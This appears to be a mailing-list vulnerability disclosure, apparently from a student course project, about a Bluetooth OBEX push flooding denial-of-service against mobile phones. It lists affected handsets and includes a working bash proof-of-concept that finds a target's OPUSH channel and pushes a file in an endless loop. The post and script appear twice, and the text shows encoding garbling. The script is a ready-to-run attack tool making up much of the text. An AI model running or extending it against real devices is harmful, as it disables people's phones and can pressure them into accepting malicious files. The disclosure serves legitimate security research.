during a course project studying security and privacy related to
Bluetooth, we discovered a simple but effective DoS attack using OBEX push.
Using ussp-push [1], it is possible to send out files very quickly. By
continuously trying to push a ï¬le, the target is ï¬?ooded with prompts
whether to accept the ï¬le or not, which disables any other usage on the
phone, including the ability to turn off Bluetooth.
We confirmed the attack to work on the following phones:
- Sony Ericsson K700i
- Nokia N70
- Motorola MOTORAZR V3
- Sony Ericsson W810i
- LG Chocolate KG800
and expect nearly all available phones with Bluetooth to be vulnerable
(in contrary to the previous DoS by l2ping).
A proof-of-concept code is attached (plain text), using ussp-push and
targeting a known MAC. This could be easily extended to target all
visible devices.
Plus, a user could be forced to accept a possibly malicious file with
this attack. Using only one Bluetooth-Dongle, we were able to
practically disable three phones simlutaneously.
Best regards,
Stefan Ekerfelt and Armin Hornung
[1] http://www.xmailserver.org/ussp-push.html
#!/bin/bash
checkOPUSH()
{
MAC=$1
OCHAN=$(sdptool search --bdaddr $MAC OPUSH | grep Channel:)
if test "$OCHAN" != ""
then
OCHAN=$(echo $OCHAN | awk '/Channel:/ { print $2 }')
return $OCHAN
fi
return 0
}
if test $# -ne 2
then
echo "Usage: $0 <bdaddr> <filename>"
exit 127
fi
MAC=$1
FILENAME=$2
checkOPUSH $1
OCHAN=$?
if test $OCHAN -eq 0
then
echo "Couldn't connect to $MAC via OBEX push."
exit 127
fi
while true
do
./ussp-push $MAC@$OCHAN $FILENAME $FILENAME
done
during a course project studying security and privacy related to
Bluetooth, we discovered a simple but effective DoS attack using OBEX push.
Using ussp-push [1], it is possible to send out files very quickly. By
continuously trying to push a ï¬le, the target is ï¬?ooded with prompts
whether to accept the ï¬le or not, which disables any other usage on the
phone, including the ability to turn off Bluetooth.
We confirmed the attack to work on the following phones:
- Sony Ericsson K700i
- Nokia N70
- Motorola MOTORAZR V3
- Sony Ericsson W810i
- LG Chocolate KG800
and expect nearly all available phones with Bluetooth to be vulnerable
(in contrary to the previous DoS by l2ping).
A proof-of-concept code is attached (plain text), using ussp-push and
targeting a known MAC. This could be easily extended to target all
visible devices.
Plus, a user could be forced to accept a possibly malicious file with
this attack. Using only one Bluetooth-Dongle, we were able to
practically disable three phones simlutaneously.
Best regards,
Stefan Ekerfelt and Armin Hornung
[1] http://www.xmailserver.org/ussp-push.html
#!/bin/bash
checkOPUSH()
{
MAC=$1
OCHAN=$(sdptool search --bdaddr $MAC OPUSH | grep Channel:)
if test "$OCHAN" != ""
then
OCHAN=$(echo $OCHAN | awk '/Channel:/ { print $2 }')
return $OCHAN
fi
return 0
}
if test $# -ne 2
then
echo "Usage: $0 <bdaddr> <filename>"
exit 127
fi
MAC=$1
FILENAME=$2
checkOPUSH $1
OCHAN=$?
if test $OCHAN -eq 0
then
echo "Couldn't connect to $MAC via OBEX push."
exit 127
fi
while true
do
./ussp-push $MAC@$OCHAN $FILENAME $FILENAME
done
[ reply ]